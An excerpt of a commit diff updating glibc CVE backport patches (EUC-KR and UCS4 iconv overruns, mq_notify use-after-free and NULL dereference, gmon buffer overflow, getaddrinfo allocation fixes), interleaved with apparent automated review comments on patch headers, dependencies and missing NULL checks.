223index 8d2bba3d43..9642eb9c92 100644
224--- a/elf/rtld.c
225+++ b/elf/rtld.c
226@@ -283,6 +283,7 @@
227 #ifdef _LIBC_REENTRANT
228 ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
229 ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
230+ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
231 #endif
232 ._dl_nns = 1,
233 ._dl_ns =
234diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c
235index c471f7b15f..021691b9b7 100644
236--- a/sysdeps/nptl/fork.c
237+++ b/sysdeps/nptl/fork.c
238@@ -125,6 +125,9 @@
239 /* Reset the lock the dynamic loader uses to protect its data. */
240 __rtld_lock_initialize (GL(dl_load_lock));
241
242+ /* Reset the lock protecting dynamic TLS related data. */
243+ __rtld_lock_initialize (GL(dl_load_tls_lock));
244+
245 /* Run the handlers registered for the child. */
246 __run_fork_handlers (atfork_run_child, multiple_threads);
247 }
248diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
249index d49529da0d..9ec1511bb0 100644
250--- a/sysdeps/generic/ldsodefs.h
251+++ b/sysdeps/generic/ldsodefs.h
252@@ -369,6 +369,13 @@
253 list of loaded objects while an object is added to or removed
254 from that list. */
255 __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock)
256+ /* This lock protects global and module specific TLS related data.
257+ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
258+ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
259+ accessed and when TLS related relocations are processed for a
260+ module. It was introduced to keep pthread_create accessing TLS
261+ state that is being set up. */
262+ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock)
263
264 /* Incremented whenever something may have been added to dl_loaded. */
265 EXTERN unsigned long long _dl_load_adds;
266@@ -1153,7 +1160,7 @@
267
268 /* Add module to slot information data. If DO_ADD is false, only the
269 required memory is allocated. Must be called with GL
270- (dl_load_lock) acquired. If the function has already been called
271+ (dl_load_tls_lock) acquired. If the function has already been called
272 for the link map L with !do_add, then this function will not raise
273 an exception, otherwise it is possible that it encounters a memory
274 allocation failure. */
275--
2762.27.0
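Review bot: The patch header does not match what the patch contains: the `From` line names commit 83b5323261bb72313bffcf37476c1b8f0847c736 while `Upstream-Status` links to h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5, and the diffstat still reads `10 files changed, 235 insertions(+), 12 deletions(-)` although only seven files are listed and patched below. The `Comment:` line says the upstream test case was removed for glibc 2.31, so the stale totals presumably come from the original commit. Please state which of the two hashes is the backport source and regenerate the diffstat, so that anyone auditing the lock changes compares against the right upstream commit. With the test dropped, the `dl_load_lock` to `dl_load_tls_lock` conversion in dl-close.c, dl-open.c and dl-tls.c has no regression coverage in this tree; a sentence in `Comment:` on how the hand-refreshed lock/unlock pairs were validated would help.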
diff --git a/meta/recipes-core/glibc/glibc/CVE-2019-25013.patch b/meta/recipes-core/glibc/glibc/CVE-2019-25013.patch
deleted file mode 100644
index 73df1da868..0000000000
--- a/meta/recipes-core/glibc/glibc/CVE-2019-25013.patch
+++ /dev/null
@@ -1,135 +0,0 @@
1From ee7a3144c9922808181009b7b3e50e852fb4999b Mon Sep 17 00:00:00 2001
2From: Andreas Schwab <schwab@suse.de>
3Date: Mon, 21 Dec 2020 08:56:43 +0530
4Subject: [PATCH] Fix buffer overrun in EUC-KR conversion module (bz #24973)
5
6The byte 0xfe as input to the EUC-KR conversion denotes a user-defined
7area and is not allowed. The from_euc_kr function used to skip two bytes
8when told to skip over the unknown designation, potentially running over
9the buffer end.
10
11Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ee7a3144c9922808181009b7b3e50e852fb4999b]
12CVE: CVE-2019-25013
13Signed-off-by: Scott Murray <scott.murray@konsulko.com>
14[Refreshed for Dundell context; Makefile changes]
15Signed-off-by: Armin Kuster <akuster@mvista.com>
16
17---
18 iconvdata/Makefile | 3 ++-
19 iconvdata/bug-iconv13.c | 53 +++++++++++++++++++++++++++++++++++++++++
20 iconvdata/euc-kr.c | 6 +----
21 iconvdata/ksc5601.h | 6 ++---
22 4 files changed, 59 insertions(+), 9 deletions(-)
23 create mode 100644 iconvdata/bug-iconv13.c
24
25Index: git/iconvdata/Makefile
26===================================================================
27--- git.orig/iconvdata/Makefile
28+++ git/iconvdata/Makefile
29@@ -73,7 +73,7 @@ modules.so := $(addsuffix .so, $(modules
30 ifeq (yes,$(build-shared))
31 tests = bug-iconv1 bug-iconv2 tst-loading tst-e2big tst-iconv4 bug-iconv4 \
32 tst-iconv6 bug-iconv5 bug-iconv6 tst-iconv7 bug-iconv8 bug-iconv9 \
33- bug-iconv10 bug-iconv11 bug-iconv12
34+ bug-iconv10 bug-iconv11 bug-iconv12 bug-iconv13
35 ifeq ($(have-thread-library),yes)
36 tests += bug-iconv3
37 endif
38Index: git/iconvdata/bug-iconv13.c
39===================================================================
40--- /dev/null
41+++ git/iconvdata/bug-iconv13.c
42@@ -0,0 +1,53 @@
43+/* bug 24973: Test EUC-KR module
44+ Copyright (C) 2020 Free Software Foundation, Inc.
45+ This file is part of the GNU C Library.
46+
47+ The GNU C Library is free software; you can redistribute it and/or
48+ modify it under the terms of the GNU Lesser General Public
49+ License as published by the Free Software Foundation; either
50+ version 2.1 of the License, or (at your option) any later version.
51+
52+ The GNU C Library is distributed in the hope that it will be useful,
53+ but WITHOUT ANY WARRANTY; without even the implied warranty of
54+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
55+ Lesser General Public License for more details.
56+
57+ You should have received a copy of the GNU Lesser General Public
58+ License along with the GNU C Library; if not, see
59+ <https://www.gnu.org/licenses/>. */
60+
61+#include <errno.h>
62+#include <iconv.h>
63+#include <stdio.h>
64+#include <support/check.h>
65+
66+static int
67+do_test (void)
68+{
69+ iconv_t cd = iconv_open ("UTF-8//IGNORE", "EUC-KR");
70+ TEST_VERIFY_EXIT (cd != (iconv_t) -1);
71+
72+ /* 0xfe (->0x7e : row 94) and 0xc9 (->0x49 : row 41) are user-defined
73+ areas, which are not allowed and should be skipped over due to
74+ //IGNORE. The trailing 0xfe also is an incomplete sequence, which
75+ should be checked first. */
76+ char input[4] = { '\xc9', '\xa1', '\0', '\xfe' };
77+ char *inptr = input;
78+ size_t insize = sizeof (input);
79+ char output[4];
80+ char *outptr = output;
81+ size_t outsize = sizeof (output);
82+
83+ /* This used to crash due to buffer overrun. */
84+ TEST_VERIFY (iconv (cd, &inptr, &insize, &outptr, &outsize) == (size_t) -1);
85+ TEST_VERIFY (errno == EINVAL);
86+ /* The conversion should produce one character, the converted null
87+ character. */
88+ TEST_VERIFY (sizeof (output) - outsize == 1);
89+
90+ TEST_VERIFY_EXIT (iconv_close (cd) != -1);
91+
92+ return 0;
93+}
94+
95+#include <support/test-driver.c>
96Index: git/iconvdata/euc-kr.c
97===================================================================
98--- git.orig/iconvdata/euc-kr.c
99+++ git/iconvdata/euc-kr.c
100@@ -80,11 +80,7 @@ euckr_from_ucs4 (uint32_t ch, unsigned c
101 \
102 if (ch <= 0x9f) \
103 ++inptr; \
104- /* 0xfe(->0x7e : row 94) and 0xc9(->0x59 : row 41) are \
105- user-defined areas. */ \
106- else if (__builtin_expect (ch == 0xa0, 0) \
107- || __builtin_expect (ch > 0xfe, 0) \
108- || __builtin_expect (ch == 0xc9, 0)) \
109+ else if (__glibc_unlikely (ch == 0xa0)) \
110 { \
111 /* This is illegal. */ \
112 STANDARD_FROM_LOOP_ERR_HANDLER (1); \
113Index: git/iconvdata/ksc5601.h
114===================================================================
115--- git.orig/iconvdata/ksc5601.h
116+++ git/iconvdata/ksc5601.h
117@@ -50,15 +50,15 @@ ksc5601_to_ucs4 (const unsigned char **s
118 unsigned char ch2;
119 int idx;
120
121+ if (avail < 2)
122+ return 0;
123+
124 /* row 94(0x7e) and row 41(0x49) are user-defined area in KS C 5601 */
125
126 if (ch < offset || (ch - offset) <= 0x20 || (ch - offset) >= 0x7e
127 || (ch - offset) == 0x49)
128 return __UNKNOWN_10646_CHAR;
129
130- if (avail < 2)
131- return 0;
132-
133 ch2 = (*s)[1];
134 if (ch2 < offset || (ch2 - offset) <= 0x20 || (ch2 - offset) >= 0x7f)
135 return __UNKNOWN_10646_CHAR;
diff --git a/meta/recipes-core/glibc/glibc/CVE-2020-29562.patch b/meta/recipes-core/glibc/glibc/CVE-2020-29562.patch
deleted file mode 100644
index c51fb3223a..0000000000
--- a/meta/recipes-core/glibc/glibc/CVE-2020-29562.patch
+++ /dev/null
@@ -1,156 +0,0 @@
1From 228edd356f03bf62dcf2b1335f25d43c602ee68d Mon Sep 17 00:00:00 2001
2From: Michael Colavita <mcolavita@fb.com>
3Date: Thu, 19 Nov 2020 11:44:40 -0500
4Subject: [PATCH] iconv: Fix incorrect UCS4 inner loop bounds (BZ#26923)
5
6Previously, in UCS4 conversion routines we limit the number of
7characters we examine to the minimum of the number of characters in the
8input and the number of characters in the output. This is not the
9correct behavior when __GCONV_IGNORE_ERRORS is set, as we do not consume
10an output character when we skip a code unit. Instead, track the input
11and output pointers and terminate the loop when either reaches its
12limit.
13
14This resolves assertion failures when resetting the input buffer in a step of
15iconv, which assumes that the input will be fully consumed given sufficient
16output space.
17
18Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=228edd356f03bf62dcf2b1335f25d43c602ee68d]
19CVE: CVE-2020-29562
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21
22---
23 iconv/Makefile | 2 +-
24 iconv/gconv_simple.c | 16 ++++----------
25 iconv/tst-iconv8.c | 50 ++++++++++++++++++++++++++++++++++++++++++++
26 3 files changed, 55 insertions(+), 13 deletions(-)
27 create mode 100644 iconv/tst-iconv8.c
28
29diff --git a/iconv/Makefile b/iconv/Makefile
30index 30bf996d3a..f9b51e23ec 100644
31--- a/iconv/Makefile
32+++ b/iconv/Makefile
33@@ -44,7 +44,7 @@ CFLAGS-linereader.c += -DNO_TRANSLITERATION
34 CFLAGS-simple-hash.c += -I../locale
35
36 tests = tst-iconv1 tst-iconv2 tst-iconv3 tst-iconv4 tst-iconv5 tst-iconv6 \
37- tst-iconv7 tst-iconv-mt tst-iconv-opt
38+ tst-iconv7 tst-iconv8 tst-iconv-mt tst-iconv-opt
39
40 others = iconv_prog iconvconfig
41 install-others-programs = $(inst_bindir)/iconv
42diff --git a/iconv/gconv_simple.c b/iconv/gconv_simple.c
43index d4797fba17..963b29f246 100644
44--- a/iconv/gconv_simple.c
45+++ b/iconv/gconv_simple.c
46@@ -239,11 +239,9 @@ ucs4_internal_loop (struct __gconv_step *step,
47 int flags = step_data->__flags;
48 const unsigned char *inptr = *inptrp;
49 unsigned char *outptr = *outptrp;
50- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
51 int result;
52- size_t cnt;
53
54- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
55+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
56 {
57 uint32_t inval;
58
59@@ -307,11 +305,9 @@ ucs4_internal_loop_unaligned (struct __gconv_step *step,
60 int flags = step_data->__flags;
61 const unsigned char *inptr = *inptrp;
62 unsigned char *outptr = *outptrp;
63- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
64 int result;
65- size_t cnt;
66
67- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
68+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
69 {
70 if (__glibc_unlikely (inptr[0] > 0x80))
71 {
72@@ -613,11 +609,9 @@ ucs4le_internal_loop (struct __gconv_step *step,
73 int flags = step_data->__flags;
74 const unsigned char *inptr = *inptrp;
75 unsigned char *outptr = *outptrp;
76- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
77 int result;
78- size_t cnt;
79
80- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
81+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
82 {
83 uint32_t inval;
84
85@@ -684,11 +678,9 @@ ucs4le_internal_loop_unaligned (struct __gconv_step *step,
86 int flags = step_data->__flags;
87 const unsigned char *inptr = *inptrp;
88 unsigned char *outptr = *outptrp;
89- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
90 int result;
91- size_t cnt;
92
93- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
94+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
95 {
96 if (__glibc_unlikely (inptr[3] > 0x80))
97 {
98diff --git a/iconv/tst-iconv8.c b/iconv/tst-iconv8.c
99new file mode 100644
100index 0000000000..0b92b19f66
101--- /dev/null
102+++ b/iconv/tst-iconv8.c
103@@ -0,0 +1,50 @@
104+/* Test iconv behavior on UCS4 conversions with //IGNORE.
105+ Copyright (C) 2020 Free Software Foundation, Inc.
106+ This file is part of the GNU C Library.
107+
108+ The GNU C Library is free software; you can redistribute it and/or
109+ modify it under the terms of the GNU Lesser General Public
110+ License as published by the Free Software Foundation; either
111+ version 2.1 of the License, or (at your option) any later version.
112+
113+ The GNU C Library is distributed in the hope that it will be useful,
114+ but WITHOUT ANY WARRANTY; without even the implied warranty of
115+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
116+ Lesser General Public License for more details.
117+
118+ You should have received a copy of the GNU Lesser General Public
119+ License along with the GNU C Library; if not, see
120+ <http://www.gnu.org/licenses/>. */
121+
122+/* Derived from BZ #26923 */
123+#include <errno.h>
124+#include <iconv.h>
125+#include <stdio.h>
126+#include <support/check.h>
127+
128+static int
129+do_test (void)
130+{
131+ iconv_t cd = iconv_open ("UTF-8//IGNORE", "ISO-10646/UCS4/");
132+ TEST_VERIFY_EXIT (cd != (iconv_t) -1);
133+
134+ /*
135+ * Convert sequence beginning with an irreversible character into buffer that
136+ * is too small.
137+ */
138+ char input[12] = "\xe1\x80\xa1" "AAAAAAAAA";
139+ char *inptr = input;
140+ size_t insize = sizeof (input);
141+ char output[6];
142+ char *outptr = output;
143+ size_t outsize = sizeof (output);
144+
145+ TEST_VERIFY (iconv (cd, &inptr, &insize, &outptr, &outsize) == -1);
146+ TEST_VERIFY (errno == E2BIG);
147+
148+ TEST_VERIFY_EXIT (iconv_close (cd) != -1);
149+
150+ return 0;
151+}
152+
153+#include <support/test-driver.c>
154--
1552.27.0
156
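--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
@@ -0,0 +1,68 @@
+From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001
+From: Andreas Schwab <schwab@linux-m68k.org>
+Date: Thu, 27 May 2021 12:49:47 +0200
+Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896)
+
+Make a deep copy of the pthread attribute object to remove a potential
+use-after-free issue.
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/NEWS b/NEWS
+index 8a20d3c4e3..be489243ac 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ using `glibc' in the "product" field.
+
+ Version 2.31.1
+
++ CVE-2021-33574: The mq_notify function has a potential use-after-free
++ issue when using a notification type of SIGEV_THREAD and a thread
++ attribute with a non-default affinity mask.
++
+ The following bugs are resolved with this release:
+ [14231] stdio-common tests memory requirements
+ [19519] iconv(1) with -c option hangs on illegal multi-byte sequences
+diff --git a/sysdeps/unix/sysv/linux/mq_notify.c b/sysdeps/unix/sysv/linux/mq_notify.c
+index f288bac477..dd47f0b777 100644
+--- a/sysdeps/unix/sysv/linux/mq_notify.c
++++ b/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -135,8 +135,11 @@ helper_thread (void *arg)
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
+- /* The only state we keep is the copy of the thread attributes. */
+- free (data.attr);
++ {
++ /* The only state we keep is the copy of the thread attributes. */
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+ }
+ return NULL;
+ }
+@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+ if (data.attr == NULL)
+ return -1;
+
+- memcpy (data.attr, notification->sigev_notify_attributes,
+- sizeof (pthread_attr_t));
++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
+ }
+
+ /* Construct the new request. */
+@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+
+ /* If it failed, free the allocated memory. */
+ if (__glibc_unlikely (retval != 0))
+- free (data.attr);
++ {
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+
+ return retval;
+ }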
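Review bot: Both new `pthread_attr_destroy (data.attr)` calls, in the `NOTIFY_REMOVED` branch of `helper_thread` and in the failure path at the end of `mq_notify`, run without checking that `data.attr` is non-NULL, and the return value of `__pthread_attr_copy` is ignored. The description of CVE-2021-33574_2.patch in this same commit states the consequence: the copy can fail and leave the attribute uninitialized, and destroying a never-allocated attribute is a null pointer dereference. This patch is therefore not safe on its own and depends on _2 being applied directly after it; if _2 does not already add them, the guards would be `if (__glibc_unlikely (retval != 0) && data.attr != NULL)` and `&& data.attr != NULL` on the `NOTIFY_REMOVED` test. `Upstream-Status: Backport` also lacks the commit link the other patches in this commit carry; the hash on the `From` line (42d359350510506b87101cf77202fefcbfc790cb) could be cited. Both functions start outside the inner hunks.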
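--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
@@ -0,0 +1,73 @@
+From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 1 Jun 2021 17:51:41 +0200
+Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
+
+__pthread_attr_copy can fail and does not initialize the attribute
+structure in that case.
+
+If __pthread_attr_copy is never called and there is no allocated
+attribute, pthread_attr_destroy should not be called, otherwise
+there is a null pointer dereference in rt/tst-mqueue6.
+
+Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
+("Use __pthread_attr_copy in mq_notify (bug 27896)").
+
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+https://sourceware.org/bugzilla/attachment.cgi?id=13497
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#2
+Signed-off-by: Armin Kuster &lt;akuster@mvista.com&gt;
+
+---
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
+ if (data.attr == NULL)
+ return -1;
+
+- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
++ memcpy (data.attr, notification->sigev_notify_attributes,
++ sizeof (pthread_attr_t));
++
++ struct pthread_attr *source =
++ (struct pthread_attr *) (notification->sigev_notify_attributes);
++ struct pthread_attr *target = (struct pthread_attr *) (data.attr);
++ cpu_set_t *newp;
++ cpu_set_t *cpuset = source->cpuset;
++ size_t cpusetsize = source->cpusetsize;
++
++ /* alloc a new memory for cpuset to avoid use after free */
++ if (cpuset != NULL && cpusetsize > 0)
++ {
++ newp = (cpu_set_t *) malloc (cpusetsize);
++ if (newp == NULL)
++ {
++ free(data.attr);
++ return -1;
++ }
++
++ memcpy (newp, cpuset, cpusetsize);
++ target->cpuset = newp;
++ }
++ else
++ {
++ target->cpuset = NULL;
++ target->cpusetsize = 0;
++ }
+ }
+
+ /* Construct the new request. */
+@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
+ int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
+
+ /* If it failed, free the allocated memory. */
+- if (__glibc_unlikely (retval != 0))
++ if (retval != 0 && data.attr != NULL)
+ {
+ pthread_attr_destroy (data.attr);
+ free (data.attr);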
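Review bot: The header and the body of this patch describe different changes: the description is about handling a failing `__pthread_attr_copy`, while the mq_notify hunk (patch lines 33-61) removes that call, which CVE-2021-33574_1.patch had just introduced, and open-codes a `memcpy` of the attribute plus a separate `malloc`/`memcpy` of `cpuset`. With `Upstream-Status: Backport` and the upstream hash in the `From` line, anyone auditing this CVE fix against upstream will expect matching code, so the header should record the deviation, e.g. `Comments: mq_notify hunk differs from upstream; open-codes the cpuset copy instead of calling __pthread_attr_copy`. The open-coded copy is only a complete deep copy if `cpuset` is the sole heap-owned member of `struct pthread_attr` in this glibc version, which is not visible here and deserves a comment next to the `memcpy`. mq_notify starts and ends outside the hunk.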
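--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
@@ -0,0 +1,41 @@
+From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
+From: Nikita Popov <npv1310@gmail.com>
+Date: Mon, 9 Aug 2021 20:17:34 +0530
+Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
+
+Helper thread frees copied attribute on NOTIFY_REMOVED message
+received from the OS kernel. Unfortunately, it fails to check whether
+copied attribute actually exists (data.attr != NULL). This worked
+earlier because free() checks passed pointer before actually
+attempting to release corresponding memory. But
+__pthread_attr_destroy assumes pointer is not NULL.
+
+So passing NULL pointer to __pthread_attr_destroy will result in
+segmentation fault. This scenario is possible if
+notification->sigev_notify_attributes == NULL (which means default
+thread attributes should be used).
+
+Signed-off-by: Nikita Popov <npv1310@gmail.com>
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-38604
+Signed-off-by: Armin Kuser <akuster@mvista.com>
+
+---
+ sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -134,7 +134,7 @@ helper_thread (void *arg)
+ to wait until it is done with it. */
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
+ {
+ /* The only state we keep is the copy of the thread attributes. */
+ pthread_attr_destroy (data.attr);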
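Review bot: The header does not record that this fix depends on CVE-2021-33574_1.patch from the same commit: the `pthread_attr_destroy (data.attr);` context at patch line 41 exists only after that patch, and the NULL dereference guarded here becomes reachable only once it is applied. If one of the two is later dropped or cherry-picked alone, the result is either a patch that no longer applies or a helper thread that crashes whenever `sigev_notify_attributes` was NULL. I would add a header line such as `Comments: depends on CVE-2021-33574_1.patch, which introduces the pthread_attr_destroy call guarded here`. helper_thread starts and ends outside the hunk.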
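--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
@@ -0,0 +1,82 @@
+From 952aff5c00ad7c6b83c3f310f2643939538827f8 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?=D0=9B=D0=B5=D0=BE=D0=BD=D0=B8=D0=B4=20=D0=AE=D1=80=D1=8C?=
+ =?UTF-8?q?=D0=B5=D0=B2=20=28Leonid=20Yuriev=29?= <leo@yuriev.ru>
+Date: Sat, 4 Feb 2023 14:41:38 +0300
+Subject: [PATCH] gmon: Fix allocated buffer overflow (bug 29444)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `__monstartup()` allocates a buffer used to store all the data
+accumulated by the monitor.
+
+The size of this buffer depends on the size of the internal structures
+used and the address range for which the monitor is activated, as well
+as on the maximum density of call instructions and/or callable functions
+that could be potentially on a segment of executable code.
+
+In particular a hash table of arcs is placed at the end of this buffer.
+The size of this hash table is calculated in bytes as
+ p->fromssize = p->textsize / HASHFRACTION;
+
+but actually should be
+ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+
+This results in writing beyond the end of the allocated buffer when an
+added arc corresponds to a call near from the end of the monitored
+address range, since `_mcount()` check the incoming caller address for
+monitored range but not the intermediate result hash-like index that
+uses to write into the table.
+
+It should be noted that when the results are output to `gmon.out`, the
+table is read to the last element calculated from the allocated size in
+bytes, so the arcs stored outside the buffer boundary did not fall into
+`gprof` for analysis. Thus this "feature" help me to found this bug
+during working with https://sourceware.org/bugzilla/show_bug.cgi?id=29438
+
+Just in case, I will explicitly note that the problem breaks the
+`make test t=gmon/tst-gmon-dso` added for Bug 29438.
+There, the arc of the `f3()` call disappears from the output, since in
+the DSO case, the call to `f3` is located close to the end of the
+monitored range.
+
+Signed-off-by: Леонид Юрьев (Leonid Yuriev) <leo@yuriev.ru>
+
+Another minor error seems a related typo in the calculation of
+`kcountsize`, but since kcounts are smaller than froms, this is
+actually to align the p->froms data.
+
+Co-authored-by: DJ Delorie <dj@redhat.com>
+Reviewed-by: Carlos O'Donell <carlos@redhat.com>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=801af9fafd4689337ebf27260aa115335a0cb2bc]
+CVE: CVE-2023-0687
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ gmon/gmon.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/gmon/gmon.c b/gmon/gmon.c
+index dee6480..bf76358 100644
+--- a/gmon/gmon.c
++++ b/gmon/gmon.c
+@@ -132,6 +132,8 @@ __monstartup (u_long lowpc, u_long highpc)
+ p->lowpc = ROUNDDOWN(lowpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->highpc = ROUNDUP(highpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->textsize = p->highpc - p->lowpc;
++ /* This looks like a typo, but it's here to align the p->froms
++ section. */
+ p->kcountsize = ROUNDUP(p->textsize / HISTFRACTION, sizeof(*p->froms));
+ p->hashfraction = HASHFRACTION;
+ p->log_hashfraction = -1;
+@@ -142,7 +144,7 @@ __monstartup (u_long lowpc, u_long highpc)
+ instead of integer division. Precompute shift amount. */
+ p->log_hashfraction = ffs(p->hashfraction * sizeof(*p->froms)) - 1;
+ }
+- p->fromssize = p->textsize / HASHFRACTION;
++ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+ p->tolimit = p->textsize * ARCDENSITY / 100;
+ if (p->tolimit < MINARCS)
+ p->tolimit = MINARCS;
+--
+2.7.4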
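Review bot: The `ROUNDUP` on `fromssize` at patch line 77 is the only guard against the out-of-bounds write, yet nothing in the hunk marks it as one. By the patch's own description, `_mcount()` range-checks the caller address but not the index it derives into `froms`, and this patch leaves that unchanged. The comment added at patch line 67 explains `kcountsize` only, so I would add above the `fromssize` assignment: `/* Must cover every froms index _mcount can compute for a pc in the monitored range; _mcount does not bounds-check the index. */`. `_mcount()` is not shown on this page, so whether an explicit index check there is practical needs confirming against the source. `__monstartup` continues outside the hunk.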
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
new file mode 100644
index 0000000000..c7db4038c2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
@@ -0,0 +1,986 @@
1From 1c37b8022e8763fedbb3f79c02e05c6acfe5a215 Mon Sep 17 00:00:00 2001
2From: Siddhesh Poyarekar <siddhesh@sourceware.org>
3Date: Thu, 17 Mar 2022 11:44:34 +0530
4Subject: [PATCH] Simplify allocations and fix merge and continue actions [BZ
5 #28931]
6
7Allocations for address tuples is currently a bit confusing because of
8the pointer chasing through PAT, making it hard to observe the sequence
9in which allocations have been made. Narrow scope of the pointer
10chasing through PAT so that it is only used where necessary.
11
12This also tightens actions behaviour with the hosts database in
13getaddrinfo to comply with the manual text. The "continue" action
14discards previous results and the "merge" action results in an immedate
15lookup failure. Consequently, chaining of allocations across modules is
16no longer necessary, thus opening up cleanup opportunities.
17
18A test has been added that checks some combinations to ensure that they
19work correctly.
20
21Resolves: BZ #28931
22
23CVE: CVE-2023-4813
24Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1c37b8022e8763fedbb3f79c02e05c6acfe5a215]
25Comments: Hunks refreshed
26
27Signed-off-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
28Reviewed-by: DJ Delorie <dj@redhat.com>
29Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
30---
31 nss/Makefile | 1 +
32 nss/tst-nss-gai-actions.c | 149 ++++++
33 nss/tst-nss-gai-actions.root/etc/host.conf | 1 +
34 nss/tst-nss-gai-actions.root/etc/hosts | 508 +++++++++++++++++++++
35 sysdeps/posix/getaddrinfo.c | 143 +++---
36 5 files changed, 750 insertions(+), 52 deletions(-)
37 create mode 100644 nss/tst-nss-gai-actions.c
38 create mode 100644 nss/tst-nss-gai-actions.root/etc/host.conf
39 create mode 100644 nss/tst-nss-gai-actions.root/etc/hosts
40
41diff --git a/nss/Makefile b/nss/Makefile
42index 42a59535cb..d8b06b44fb 100644
43--- a/nss/Makefile
44+++ b/nss/Makefile
45@@ -61,6 +61,7 @@
46
47 tests-container = \
48 tst-nss-test3 \
49+ tst-nss-gai-actions \
50 tst-nss-files-hosts-long \
51 tst-nss-db-endpwent \
52 tst-nss-db-endgrent
53diff --git a/nss/tst-nss-gai-actions.c b/nss/tst-nss-gai-actions.c
54new file mode 100644
55index 0000000000..efca6cd183
56--- /dev/null
